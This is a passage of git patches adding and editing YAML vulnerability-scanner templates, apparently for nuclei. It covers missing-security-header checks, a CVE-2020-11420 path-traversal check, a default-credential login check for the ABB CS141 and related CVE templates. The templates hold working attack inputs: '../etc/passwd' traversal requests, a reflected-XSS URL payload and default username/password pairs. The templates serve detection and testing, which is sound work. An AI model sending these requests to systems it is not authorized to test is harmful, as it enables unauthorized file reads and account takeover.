From 71a27da89178b90d7ad593bb04e850f691dfb04d Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 28 Jul 2021 14:40:20 +0200 Subject: [PATCH 001/339] Added security headers templates --- .../http-present-security-headers.yaml | 116 ++++++++++++++++++ .../http-missing-security-headers.yaml | 113 +++++++++++++++++ 2 files changed, 229 insertions(+) create mode 100644 miscellaneous/http-present-security-headers.yaml create mode 100644 misconfiguration/http-missing-security-headers.yaml diff --git a/miscellaneous/http-present-security-headers.yaml b/miscellaneous/http-present-security-headers.yaml new file mode 100644 index 0000000000..66b98f6ea2 --- /dev/null +++ b/miscellaneous/http-present-security-headers.yaml @@ -0,0 +1,116 @@ +id: http-present-security-headers + +info: + name: HTTP Present Security Headers + author: socketz + severity: info + description: It searches present security headers, but obviously, could be so less generic and could be useless for Bug Bounty. + tags: config,headers + +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 3 + extractors: + - type: regex + part: header + group: 0 + regex: + - "(?im)(Strict-Transport-Security):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-Frame-Options):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-Content-Type-Options):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Content-Security-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-Permitted-Cross-Domain-Policies):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Referrer-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Clear-Site-Data):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Cross-Origin-Embedder-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Cross-Origin-Opener-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Cross-Origin-Resource-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-XSS-Protection):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Public-Key-Pins):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Except-CT):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Feature-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Permissions-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Document-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-XSRF-TOKEN):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-CSRF-TOKEN):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-CSRFToken):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Authorization):(.*)" diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml new file mode 100644 index 0000000000..64db558b09 --- /dev/null +++ b/misconfiguration/http-missing-security-headers.yaml @@ -0,0 +1,113 @@ +id: http-missing-security-headers + +info: + name: HTTP Missing Security Headers + author: socketz + severity: info + description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. + tags: config,headers,misconfiguration + +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 3 + matchers-condition: or + matchers: + - type: word + name: "Strict-Transport-Security" + words: + - "Strict-Transport-Security" + part: header + negative: true + - type: word + name: "Content-Security-Policy" + words: + - "Content-Security-Policy" + part: header + negative: true + - type: word + name: "X-Frame-Options" + words: + - "X-Frame-Options" + part: header + negative: true + - type: word + name: "X-Content-Type-Options" + words: + - "X-Content-Type-Options" + part: header + negative: true + - type: word + name: "X-Permitted-Cross-Domain-Policies" + words: + - "X-Permitted-Cross-Domain-Policies" + part: header + negative: true + - type: word + name: "Referrer-Policy" + words: + - "Referrer-Policy" + part: header + negative: true + - type: word + name: "Clear-Site-Data" + words: + - "Clear-Site-Data" + part: header + negative: true + - type: word + name: "Cross-Origin-Embedder-Policy" + words: + - "Cross-Origin-Embedder-Policy" + part: header + negative: true + - type: word + name: "Cross-Origin-Opener-Policy" + words: + - "Cross-Origin-Opener-Policy" + part: header + negative: true + - type: word + name: "Cross-Origin-Resource-Policy" + words: + - "Cross-Origin-Resource-Policy" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Origin" + words: + - "Access-Control-Allow-Origin" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Credentials" + words: + - "Access-Control-Allow-Credentials" + part: header + negative: true + - type: word + name: "Access-Control-Expose-Headers" + words: + - "Access-Control-Expose-Headers" + part: header + negative: true + - type: word + name: "Access-Control-Max-Age" + words: + - "Access-Control-Max-Age" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Methods" + words: + - "Access-Control-Allow-Methods" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Headers" + words: + - "Access-Control-Allow-Headers" + part: header + negative: true From 7d6a6c137a22acf4a797bab040e5f25d4154c05e Mon Sep 17 00:00:00 2001 From: socketz Date: Tue, 24 Aug 2021 14:43:45 +0200 Subject: [PATCH 002/339] Added CVE-2020-11420 --- cves/2020/CVE-2020-11420.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2020/CVE-2020-11420.yaml diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml new file mode 100644 index 0000000000..e418ec32b9 --- /dev/null +++ b/cves/2020/CVE-2020-11420.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-11420 + +info: + name: ABB UPS Adapter CS141 – Path traversal + author: socketz + severity: medium + description: | + A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker + with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that + reference files and by doing this achieve access to files and directories outside the web root folder. An + attacker may access arbitrary files and directories stored in the file system, but integrity of the files are + not jeopardized as attacker have read access rights only. This attack is commonly known as Path + Traversal or Directory Traversal. + This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, + and then you can exploit it, before that, you should wait. + reference: | + - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf + tags: cve,cve2020,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" + headers: + - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body + From 65d9d8acb297ff994b207a71876e67305ebbfcef Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 24 Aug 2021 23:13:00 +0530 Subject: [PATCH 003/339] lint fix --- cves/2020/CVE-2020-11420.yaml | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml index e418ec32b9..123a068098 100644 --- a/cves/2020/CVE-2020-11420.yaml +++ b/cves/2020/CVE-2020-11420.yaml @@ -5,15 +5,15 @@ info: author: socketz severity: medium description: | - A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker - with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that - reference files and by doing this achieve access to files and directories outside the web root folder. An - attacker may access arbitrary files and directories stored in the file system, but integrity of the files are - not jeopardized as attacker have read access rights only. This attack is commonly known as Path + A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker + with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that + reference files and by doing this achieve access to files and directories outside the web root folder. An + attacker may access arbitrary files and directories stored in the file system, but integrity of the files are + not jeopardized as attacker have read access rights only. This attack is commonly known as Path Traversal or Directory Traversal. - This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, + This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, and then you can exploit it, before that, you should wait. - reference: | + reference: - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf tags: cve,cve2020,iot,lfi @@ -31,5 +31,4 @@ requests: - type: regex regex: - "root:.*:0:0:" - part: body - + part: body \ No newline at end of file From 3c95101f5a205906e29ec2437f5e25d1dcba5776 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 25 Aug 2021 00:31:27 +0530 Subject: [PATCH 004/339] Update CVE-2020-11420.yaml --- cves/2020/CVE-2020-11420.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml index 123a068098..7a8affbb53 100644 --- a/cves/2020/CVE-2020-11420.yaml +++ b/cves/2020/CVE-2020-11420.yaml @@ -21,8 +21,10 @@ requests: - method: GET path: - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" + headers: - - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + matchers-condition: and matchers: - type: status From d705fbd84bd910dd7d064da1746cb59c2741850b Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 25 Aug 2021 00:33:54 +0530 Subject: [PATCH 005/339] Update CVE-2020-11420.yaml --- cves/2020/CVE-2020-11420.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml index 7a8affbb53..be676408b1 100644 --- a/cves/2020/CVE-2020-11420.yaml +++ b/cves/2020/CVE-2020-11420.yaml @@ -23,7 +23,7 @@ requests: - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" headers: - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" matchers-condition: and matchers: From f290b9f60d7aa2dc8d752605b12d46f327f8f5e2 Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 07:55:46 +0200 Subject: [PATCH 006/339] Deleted duplicate and in wrong directory --- cves/2020/CVE-2019-9618.yaml | 26 -------------------------- 1 file changed, 26 deletions(-) delete mode 100644 cves/2020/CVE-2019-9618.yaml diff --git a/cves/2020/CVE-2019-9618.yaml b/cves/2020/CVE-2019-9618.yaml deleted file mode 100644 index bc0a6e0e6d..0000000000 --- a/cves/2020/CVE-2019-9618.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2019-9618 - -info: - name: GraceMedia Media Player 1.0 - Local File Inclusion - author: 0x_Akoko - severity: critical - reference: | - - https://www.exploit-db.com/exploits/46537 - - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 - tags: cve,cve2019,wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 \ No newline at end of file From 0ef631dce102db77f5d848cc97eb3da0cbc77e7b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:52:35 +0530 Subject: [PATCH 007/339] Update http-missing-security-headers.yaml --- misconfiguration/http-missing-security-headers.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index 64db558b09..350fcbe9db 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -5,7 +5,7 @@ info: author: socketz severity: info description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. - tags: config,headers,misconfiguration + tags: config,headers,misconfiguration,generic requests: - method: GET From c766a8454d24d6512ee21c793205113212ba2ded Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 14:09:42 +0200 Subject: [PATCH 008/339] Fixed yaml linting errors --- cves/2012/CVE-2012-1835.yaml | 10 +++++----- cves/2018/CVE-2018-10818.yaml | 2 +- cves/2018/CVE-2018-10822.yaml | 2 +- cves/2019/CVE-2019-12616.yaml | 11 +++++------ cves/2019/CVE-2019-9618.yaml | 3 ++- cves/2020/CVE-2020-7209.yaml | 11 +++++------ cves/2020/CVE-2020-8813.yaml | 2 +- cves/2020/CVE-2020-9496.yaml | 13 ++++++------- misconfiguration/java-melody-exposed.yaml | 2 +- vulnerabilities/other/mcafee-epo-rce.yaml | 2 +- .../other/netgear-router-auth-bypass.yaml | 2 +- 11 files changed, 29 insertions(+), 31 deletions(-) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index 9bc5c08991..d92d5b7974 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml @@ -11,11 +11,11 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - "{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index 2562be9725..da59c53d73 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -4,7 +4,7 @@ info: name: LG NAS Devices - Remote Code Execution (Unauthenticated) author: gy741 severity: critical - description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. + description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter. reference: | - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 diff --git a/cves/2018/CVE-2018-10822.yaml b/cves/2018/CVE-2018-10822.yaml index 17410d6679..7078f33dfc 100644 --- a/cves/2018/CVE-2018-10822.yaml +++ b/cves/2018/CVE-2018-10822.yaml @@ -4,7 +4,7 @@ info: name: D-Link Routers - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. + description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request. reference: | - https://www.exploit-db.com/exploits/45678 - https://nvd.nist.gov/vuln/detail/CVE-2018-10822 diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index 1c3352b08d..00eb781972 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -6,10 +6,10 @@ info: description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. severity: medium tags: cve,cve2019,phpmyadmin,csrf - reference: | - - https://www.phpmyadmin.net/security/PMASA-2019-4/ - - https://www.exploit-db.com/exploits/46982 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + reference: + - https://www.phpmyadmin.net/security/PMASA-2019-4/ + - https://www.exploit-db.com/exploits/46982 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 requests: - method: GET @@ -18,7 +18,6 @@ requests: matchers-condition: and matchers: - - type: word words: - "phpmyadmin.net" @@ -32,4 +31,4 @@ requests: - type: status status: - 200 - - 401 #password protected + - 401 # password protected diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index 5ed8f7c7f0..b74a1b1b13 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -8,6 +8,8 @@ info: reference: | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - https://seclists.org/fulldisclosure/2019/Mar/26 + - https://www.exploit-db.com/exploits/46537 + - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 tags: cve,cve2019,wordpress,wp-plugin,lfi requests: @@ -17,7 +19,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index 74841a4ce3..ab9f1ff023 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml @@ -11,12 +11,11 @@ info: http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2 - # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. - # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. - - # https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - # vendor: https://www.hpe.com/us/en/home.html - # software: https://github.com/HewlettPackard/LinuxKI + # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. + # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. + # https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 + # vendor: https://www.hpe.com/us/en/home.html + # software: https://github.com/HewlettPackard/LinuxKI requests: - method: GET diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index 586fc0dfb9..823b53f29c 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml @@ -4,7 +4,7 @@ info: name: Cacti v1.2.8 - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability + description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability reference: | - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ tags: cve,cve2020,cacti,rce,oob diff --git a/cves/2020/CVE-2020-9496.yaml b/cves/2020/CVE-2020-9496.yaml index bf637b1ef7..e5f5e730c5 100644 --- a/cves/2020/CVE-2020-9496.yaml +++ b/cves/2020/CVE-2020-9496.yaml @@ -10,13 +10,12 @@ info: - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html - - # This template detects a Java deserialization vulnerability in Apache - # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for - # versions prior to 17.12.04. - # -- - # References: - # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz + # This template detects a Java deserialization vulnerability in Apache + # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for + # versions prior to 17.12.04. + # -- + # References: + # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz requests: - raw: diff --git a/misconfiguration/java-melody-exposed.yaml b/misconfiguration/java-melody-exposed.yaml index 0139f7ec02..a2e2f0686d 100644 --- a/misconfiguration/java-melody-exposed.yaml +++ b/misconfiguration/java-melody-exposed.yaml @@ -4,7 +4,7 @@ info: name: JavaMelody Monitoring Exposed author: dhiyaneshDK,thomas_from_offensity severity: medium - description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a user’s session. + description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to "View http sessions". This can be used by an attacker to steal a user’s session. reference: | - https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/ - https://github.com/javamelody/javamelody/wiki/UserGuide#16-security diff --git a/vulnerabilities/other/mcafee-epo-rce.yaml b/vulnerabilities/other/mcafee-epo-rce.yaml index 8524264b95..8d8f248d89 100644 --- a/vulnerabilities/other/mcafee-epo-rce.yaml +++ b/vulnerabilities/other/mcafee-epo-rce.yaml @@ -8,7 +8,7 @@ info: A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO) is a type of Path Traversal occurring when archives are unpacked if the names of the packed files are not properly sanitized. - An attacker can create archives with files containing “../” in their names, + An attacker can create archives with files containing "../" in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction. diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index f2d94ceba8..c558f9bfde 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -4,7 +4,7 @@ info: name: Netgear DGN2200v1 Router Authentication Bypass author: gy741 severity: high - description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”). + description: NETGEAR decided to use to check if a page has ".jpg", ".gif" or "ess_" substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like "?.gif"). reference: | - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 From 5ae8bf50889c0a39900fe66312cde19317810441 Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 14:32:17 +0200 Subject: [PATCH 009/339] Added CS141 SNMP template to default-logins --- default-logins/abb/cs141-default-login.yaml | 64 +++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 default-logins/abb/cs141-default-login.yaml diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml new file mode 100644 index 0000000000..25b6b8a36e --- /dev/null +++ b/default-logins/abb/cs141-default-login.yaml @@ -0,0 +1,64 @@ +id: cs141-default-login + +info: + name: CS141 SNMP Module Default Credentials + author: socketz + severity: medium + reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf + tags: hiawatha,iot,default-login + +requests: + - raw: + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"admin","password":"cs141-snmp"} + + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"engineer","password":"engineer"} + + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"guest","password":"guest"} + + matchers-condition: and + matchers: + - type: word + words: + - 'accessToken' + - 'application/json' + condition: and + part: header + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - accessToken From 35570987e0eb68170e1e129bfc6d0dd11dd99326 Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 14:47:28 +0200 Subject: [PATCH 010/339] Removed useless template --- .../http-present-security-headers.yaml | 116 ------------------ 1 file changed, 116 deletions(-) delete mode 100644 miscellaneous/http-present-security-headers.yaml diff --git a/miscellaneous/http-present-security-headers.yaml b/miscellaneous/http-present-security-headers.yaml deleted file mode 100644 index 66b98f6ea2..0000000000 --- a/miscellaneous/http-present-security-headers.yaml +++ /dev/null @@ -1,116 +0,0 @@ -id: http-present-security-headers - -info: - name: HTTP Present Security Headers - author: socketz - severity: info - description: It searches present security headers, but obviously, could be so less generic and could be useless for Bug Bounty. - tags: config,headers - -requests: - - method: GET - path: - - "{{BaseURL}}" - redirects: true - max-redirects: 3 - extractors: - - type: regex - part: header - group: 0 - regex: - - "(?im)(Strict-Transport-Security):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Frame-Options):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Content-Type-Options):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Content-Security-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Permitted-Cross-Domain-Policies):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Referrer-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Clear-Site-Data):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Embedder-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Opener-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Resource-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-XSS-Protection):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Public-Key-Pins):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Except-CT):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Feature-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Permissions-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Document-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-XSRF-TOKEN):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-CSRF-TOKEN):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-CSRFToken):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Authorization):(.*)" From 5472deb9b4b6ee53e31e6a3c4e26ec77fe14cfed Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 14:05:10 +0530 Subject: [PATCH 011/339] Update cs141-default-login.yaml --- default-logins/abb/cs141-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 25b6b8a36e..cb51eede2c 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -20,7 +20,7 @@ requests: Connection: close {"userName":"admin","password":"cs141-snmp"} - + - | POST /api/login HTTP/1.1 Host: {{Hostname}} From f3348fa612655903df468d584ba315f45bbd3910 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 30 Aug 2021 12:53:22 +0300 Subject: [PATCH 012/339] Updated --- cves/2019/CVE-2019-14470.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml index 05400bc1a4..82704b61f3 100644 --- a/cves/2019/CVE-2019-14470.yaml +++ b/cves/2019/CVE-2019-14470.yaml @@ -4,6 +4,7 @@ info: name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: cosenary Instagram-PHP-API (aka Instagram PHP API V2), as used in the UserPro plugin through 4.9.32 for WordPress, has XSS via the 